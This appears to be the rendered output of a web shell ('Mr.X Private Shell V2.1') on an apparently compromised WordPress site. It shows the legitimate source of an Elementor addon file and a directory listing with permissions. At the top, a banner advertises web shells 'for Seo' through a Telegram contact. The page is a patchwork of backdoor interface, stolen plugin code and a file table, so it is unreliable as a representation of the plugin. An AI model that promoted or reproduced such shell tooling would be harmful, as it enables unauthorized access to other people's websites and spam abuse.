__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
if ( ! defined( 'ABSPATH' ) ) {
exit; // Exit if accessed directly.
}
use WprAddons\Admin\Templates\Library\WPR_Templates_Data;
use WprAddons\Admin\Templates\Library\WPR_Templates_Library_Blocks;
use WprAddons\Classes\Utilities;
use Elementor\Plugin;
// Register Menus
function wpr_addons_add_premade_blocks_menu() {
add_submenu_page( 'wpr-addons', 'Premade Blocks', 'Premade Blocks', 'manage_options', 'wpr-premade-blocks', 'wpr_addons_premade_blocks_page' );
}
add_action( 'admin_menu', 'wpr_addons_add_premade_blocks_menu' );
/**
** Render Premade Blocks Page
*/
function wpr_addons_premade_blocks_page() {
?>
<div class="wpr-premade-blocks-page">
<div class="wpr-settings-page-header">
<h1><?php echo esc_html(Utilities::get_plugin_name(true)); ?></h1>
<p><?php esc_html_e( 'The most powerful Elementor Addon in the universe.', 'wpr-addons' ); ?></p>
</div>
<?php WPR_Templates_Library_Blocks::render_library_templates_blocks(); ?>
</div>
<?php
} // End wpr_addons_premade_blocks_page()
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| import | Folder | 0775 |
|
|
| includes | Folder | 0775 |
|
|
| metabox | Folder | 0775 |
|
|
| notices | Folder | 0775 |
|
|
| templates | Folder | 0775 |
|
|
| mega-menu.php | File | 16.09 KB | 0775 |
|
| plugin-options.php | File | 97.08 KB | 0775 |
|
| popups.php | File | 3.45 KB | 0775 |
|
| premade-blocks.php | File | 1.01 KB | 0775 |
|
| templates-kit.php | File | 39.91 KB | 0775 |
|
| theme-builder.php | File | 9.35 KB | 0775 |
|